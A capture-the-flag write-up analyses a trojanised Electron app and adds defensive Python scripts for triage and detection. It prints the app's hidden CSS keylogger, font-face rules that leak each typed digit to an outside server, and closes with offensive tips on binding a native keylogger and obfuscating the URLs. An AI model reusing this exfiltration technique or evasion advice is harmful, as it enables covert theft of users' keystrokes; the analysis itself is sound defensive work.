Hello Penetration Testers,
This is our writeup for ASC 2018 CYBER WARGAMES "QUALIFICATION PHASE".
Task one: find out what is wrong with the downloaded app.
- Electron is a JavaScript framework used to build desktop apps for Linux and Windows.
- By comparing the MD5 hashes with the original MD5 hashes from GitHub (https://github.com/electron/electron/releases/tag/v2.0.0), we found that 90% of the app is safe, since it is an exact match with the author's release.
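The hash comparison above is the first triage step: unpack the downloaded build next to a clean copy of the release and list which files match and which do not. The script below is an added example, not part of the original writeup, that does exactly that for two directory trees; the sample trees it builds (file names and contents) are constructed placeholders, not the real Electron layout, and MD5 is used only to mirror the writeup (SHA-256 is the better choice for new work).

```python
import hashlib
import tempfile
from pathlib import Path


def file_digest(path, algo="md5"):
    """Hash one file in chunks (md5 to match the writeup; prefer sha256 today)."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root, algo="md5"):
    """Map every file under root (relative POSIX path) to its digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): file_digest(p, algo)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_trees(reference, suspect, algo="md5"):
    """Classify the suspect tree's files against the reference release."""
    ref, sus = hash_tree(reference, algo), hash_tree(suspect, algo)
    common = ref.keys() & sus.keys()
    report = {
        "unchanged": sorted(k for k in common if ref[k] == sus[k]),
        "modified": sorted(k for k in common if ref[k] != sus[k]),
        "added": sorted(sus.keys() - ref.keys()),
        "removed": sorted(ref.keys() - sus.keys()),
    }
    # Share of the downloaded tree that is byte-identical to the release.
    report["unchanged_ratio"] = len(report["unchanged"]) / (len(sus) or 1)
    return report


def build_sample_trees():
    """Constructed stand-in trees: a clean 'release' and a tampered 'download'.
    Paths and contents are placeholders, not the real Electron file layout."""
    base = Path(tempfile.mkdtemp(prefix="asar-diff-"))
    ref, sus = base / "reference", base / "downloaded"
    genuine = {
        "electron": b"\x7fELF placeholder binary",
        "LICENSE": b"MIT License (placeholder)",
        "resources/app/main.js": b"require('electron'); // placeholder",
        "resources/app/index.html": b"<html><body><input></body></html>",
    }
    for tree in (ref, sus):
        for rel, data in genuine.items():
            path = tree / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(data)
    # The downloaded copy carries an altered page and an extra stylesheet.
    (sus / "resources/app/index.html").write_bytes(
        b"<html><head><link rel=stylesheet href=style.css></head>"
        b"<body><input></body></html>")
    (sus / "resources/app/style.css").write_bytes(b"input { font-family: x; }")
    return ref, sus


if __name__ == "__main__":
    ref, sus = build_sample_trees()
    for kind, value in compare_trees(ref, sus).items():
        print(kind, value)
```

Point `compare_trees` at the unpacked release and the unpacked `resources/app.asar` of the download; the "modified" and "added" lists are the files to read first.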
Task two: write a writeup about the malicious functionality and how you found it.
- However, the other 10% is malicious…
I executed the file and, in another terminal window, I ran `ps -ax` to get the process PID.
Then I ran:
cat /proc/{pid}/maps
– While reading it, I found "/root/.config/wargames2018/".
– I analyzed the files in that path and found requests to servers.
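Reading /proc/{pid}/maps by eye works for one process; the parser below (an added example, not from the original writeup) does the same triage mechanically: it lists every file-backed mapping, filters out the usual system directories so that paths like the one above stand out, and also reports regions mapped writable and executable. The sample maps text is constructed (the app path and inode numbers are placeholders, not values from the real capture).

```python
import re

# One /proc/<pid>/maps line: start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+(\S+)\s+(\d+)\s*(.*)$")

# Directories where a packaged app's mapped files are expected; anything else
# (home directories, /tmp, ...) deserves a look.
EXPECTED_PREFIXES = ("/usr/", "/lib/", "/lib64/", "/bin/", "/sbin/", "/etc/")

# Constructed sample modelled on the writeup's finding (placeholder addresses,
# inodes and app path; only the .config path mirrors the writeup).
SAMPLE_MAPS = """\
55d3c9a00000-55d3c9c00000 r-xp 00000000 08:01 262145 /opt/wargames/electron
55d3c9e00000-55d3c9e20000 rw-p 00000000 00:00 0 [heap]
7f10a4000000-7f10a41c0000 r-xp 00000000 08:01 1310722 /usr/lib/x86_64-linux-gnu/libc.so.6
7f10a4200000-7f10a4210000 rw-p 00000000 00:00 0
7f10a4300000-7f10a4320000 rwxp 00000000 00:00 0
7f10a4400000-7f10a4500000 r--s 00000000 08:01 393218 /root/.config/wargames2018/Cache/data_0
7f10a4500000-7f10a4600000 rw-s 00000000 08:01 393218 /root/.config/wargames2018/Cache/data_0
7ffd5c000000-7ffd5c021000 rw-p 00000000 00:00 0 [stack]
"""


def parse_maps(text):
    """Parse maps lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue
        start, end, perms, offset, dev, inode, path = m.groups()
        entries.append({"start": int(start, 16), "end": int(end, 16), "perms": perms,
                        "offset": int(offset, 16), "dev": dev, "inode": int(inode),
                        "path": path})
    return entries


def mapped_files(text):
    """Unique file-backed paths in first-seen order ([heap], [stack] and anonymous
    regions are excluded because they do not start with '/')."""
    seen = []
    for e in parse_maps(text):
        if e["path"].startswith("/") and e["path"] not in seen:
            seen.append(e["path"])
    return seen


def unusual_files(text, expected=EXPECTED_PREFIXES):
    """Mapped files outside the expected system directories."""
    return [p for p in mapped_files(text) if not p.startswith(expected)]


def writable_executable(text):
    """Regions mapped both writable and executable. JIT engines such as V8 create
    some of these legitimately, so treat them as leads to inspect, not verdicts."""
    return [(e["start"], e["end"]) for e in parse_maps(text)
            if "w" in e["perms"] and "x" in e["perms"]]


if __name__ == "__main__":
    for path in unusual_files(SAMPLE_MAPS):
        print("look at:", path)
    for start, end in writable_executable(SAMPLE_MAPS):
        print(f"rwx region: {start:x}-{end:x}")
```

On a live system, replace `SAMPLE_MAPS` with `open(f"/proc/{pid}/maps").read()`; the `EXPECTED_PREFIXES` tuple is a starting point and should be tuned to where the package is actually installed.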
- Since all Electron apps are packed with asar, the archive can be unpacked without any problems.
- By extracting the `resources/app.asar` file, we found that the app sends malicious requests to the following IP: "142.93.106.129"
(1)/resources/app/index.html
|_> http://142.93.106.129/0000
|_> http://142.93.106.129/0001
|_> http://142.93.106.129/0010
|_> http://142.93.106.129/0011
|_> http://142.93.106.129/0100
|_> http://142.93.106.129/0101
|_> http://142.93.106.129/0111
|_> http://142.93.106.129/1000
|_> http://142.93.106.129/1001
(2)/resources/app/style.css
|_> http://142.93.106.129/log?a
|_> http://142.93.106.129/log?b
|_> http://142.93.106.129/log?c
|_> http://142.93.106.129/log?d
By decoding the binary from set (1):
|_> http://142.93.106.129/0
|_> http://142.93.106.129/1
|_> http://142.93.106.129/2
|_> http://142.93.106.129/3
|_> http://142.93.106.129/4
|_> http://142.93.106.129/5
|_> http://142.93.106.129/6
|_> http://142.93.106.129/7
|_> http://142.93.106.129/8
After looking at the following code:
@font-face { font-family: x; src: url(http://142.93.106.129/0000); unicode-range: U+30; }
@font-face { font-family: x; src: url(http://142.93.106.129/0001); unicode-range: U+31; }
@font-face { font-family: x; src: url(http://142.93.106.129/0010); unicode-range: U+32; }
@font-face { font-family: x; src: url(http://142.93.106.129/0011); unicode-range: U+33; }
@font-face { font-family: x; src: url(http://142.93.106.129/0100); unicode-range: U+34; }
@font-face { font-family: x; src: url(http://142.93.106.129/0101); unicode-range: U+35; }
@font-face { font-family: x; src: url(http://142.93.106.129/0110); unicode-range: U+36; }
@font-face { font-family: x; src: url(http://142.93.106.129/0111); unicode-range: U+37; }
@font-face { font-family: x; src: url(http://142.93.106.129/1000); unicode-range: U+38; }
@font-face { font-family: x; src: url(http://142.93.106.129/1001); unicode-range: U+39; }
The C2 server is 142.93.106.129 and the path is just numbers [1-9] (binary-encoded).
It then tracks user input by applying that font to the input fields:
input { font-family: x; }
So, for example, if the user types the PIN 1234, we apply this filter in Wireshark:
http && ip.addr == 142.93.106.129
and, as the PIN is typed, we can see the HTTP requests to the server:
GET /0001 HTTP/1.1
GET /0010 HTTP/1.1
GET /0011 HTTP/1.1
GET /0100 HTTP/1.1
0001 0010 0011 0100 = 1234
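Two things a defender wants from the finding above: a way to spot this pattern in a stylesheet without reading every rule, and a way to turn a captured request log back into what was typed, as the Wireshark session does by hand. The script below is an added example, not code from the writeup or from the challenge binary. It parses `@font-face` rules, flags font families whose faces each cover only a few code points and are fetched from a remote server (a legitimate webfont covers a broad range), and then maps captured `GET` lines back to characters. The sample stylesheet and request lines are constructed; they reuse the writeup's server address and paths for illustration, plus one benign webfont rule to show it is not flagged.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample stylesheet with the same shape as the rules in the writeup,
# plus one ordinary webfont rule (placeholder URL) that should not be flagged.
SAMPLE_CSS = "\n".join(
    f"@font-face {{ font-family: x; src: url(http://142.93.106.129/{d:04b}); "
    f"unicode-range: U+{0x30 + d:X}; }}"
    for d in range(10)
) + """
@font-face { font-family: body; src: url(https://fonts.example/body.woff2); unicode-range: U+0000-00FF; }
input { font-family: x; }
"""

# Constructed request lines, as the capture filter shows them when "1234" is typed;
# a /log?a request from the second set is included to show it is ignored.
SAMPLE_REQUESTS = [
    "GET /0001 HTTP/1.1",
    "GET /0010 HTTP/1.1",
    "GET /0011 HTTP/1.1",
    "GET /log?a HTTP/1.1",
    "GET /0100 HTTP/1.1",
]

FONT_FACE_RE = re.compile(r"@font-face\s*\{([^}]*)\}", re.I)
DECL_RE = re.compile(r"([a-z-]+)\s*:\s*([^;]+)")
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)['\"]?\s*\)", re.I)


def parse_unicode_range(value):
    """Expand a unicode-range value (U+30, U+30-39, U+3?, comma lists) into code points."""
    cps = set()
    for token in value.split(","):
        m = re.fullmatch(r"U\+([0-9A-F?]+)(?:-([0-9A-F]+))?", token.strip().upper())
        if not m:
            continue
        lo, hi = m.groups()
        if "?" in lo:  # wildcard form: U+3? means U+30-3F
            lo_v, hi_v = int(lo.replace("?", "0"), 16), int(lo.replace("?", "F"), 16)
        else:
            lo_v = int(lo, 16)
            hi_v = int(hi, 16) if hi else lo_v
        cps.update(range(lo_v, hi_v + 1))
    return cps


def parse_font_faces(css):
    """Return family, src URL and unicode-range for each @font-face rule."""
    faces = []
    for body in FONT_FACE_RE.findall(css):
        decl = {k.lower(): v.strip() for k, v in DECL_RE.findall(body)}
        url = URL_RE.search(decl.get("src", ""))
        faces.append({"family": decl.get("font-family", "").strip("'\""),
                      "url": url.group(1) if url else None,
                      "range": decl.get("unicode-range")})
    return faces


def find_exfil_fonts(css, max_cps=4):
    """Families with two or more remote faces that each cover only a few code points."""
    by_family = defaultdict(list)
    for f in parse_font_faces(css):
        remote = f["url"] and f["url"].lower().startswith(("http://", "https://"))
        if not remote or not f["range"]:
            continue
        cps = parse_unicode_range(f["range"])
        if 0 < len(cps) <= max_cps:
            by_family[f["family"]].append((f["url"], cps))
    return {fam: rules for fam, rules in by_family.items() if len(rules) >= 2}


def decode_requests(log_lines, exfil_fonts):
    """Turn captured GET lines back into the characters whose 'glyphs' were fetched."""
    path_to_char = {urlparse(url).path: chr(next(iter(cps)))
                    for rules in exfil_fonts.values()
                    for url, cps in rules if len(cps) == 1}
    typed = []
    for line in log_lines:
        m = re.match(r"^GET\s+(\S+)\s+HTTP/", line.strip())
        if m and m.group(1) in path_to_char:
            typed.append(path_to_char[m.group(1)])
    return "".join(typed)


if __name__ == "__main__":
    flagged = find_exfil_fonts(SAMPLE_CSS)
    print("suspicious families:", sorted(flagged))
    print("reconstructed input:", decode_requests(SAMPLE_REQUESTS, flagged))
```

Feed `find_exfil_fonts` the extracted stylesheet (or the inline styles from index.html) and `decode_requests` the request lines exported from the Wireshark capture; the threshold `max_cps` is the assumption that an exfiltration face covers one or very few characters, which is what makes each fetched URL identify a keystroke.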
Task three: bonus and improvements
#1
– You can create a keylogger and bind it with the Electron app, because a keylogger written in C or C++ is better than a keylogger with cache and JavaScript.
– With step 1, the keylogger will always be connected to a server, like Trojans (e.g. njRAT); that is better than the app sending requests with cached keystrokes every 3 minutes.
#2
This can be improved by using JavaScript to obfuscate the URLs and the injection, to make it a little harder to find.
#3
https://www.shodan.io/host/142.93.106.129
Host "142.93.106.129" is using an outdated version of Apache (2.4.7), with the SSH port open.
Best,
Youssef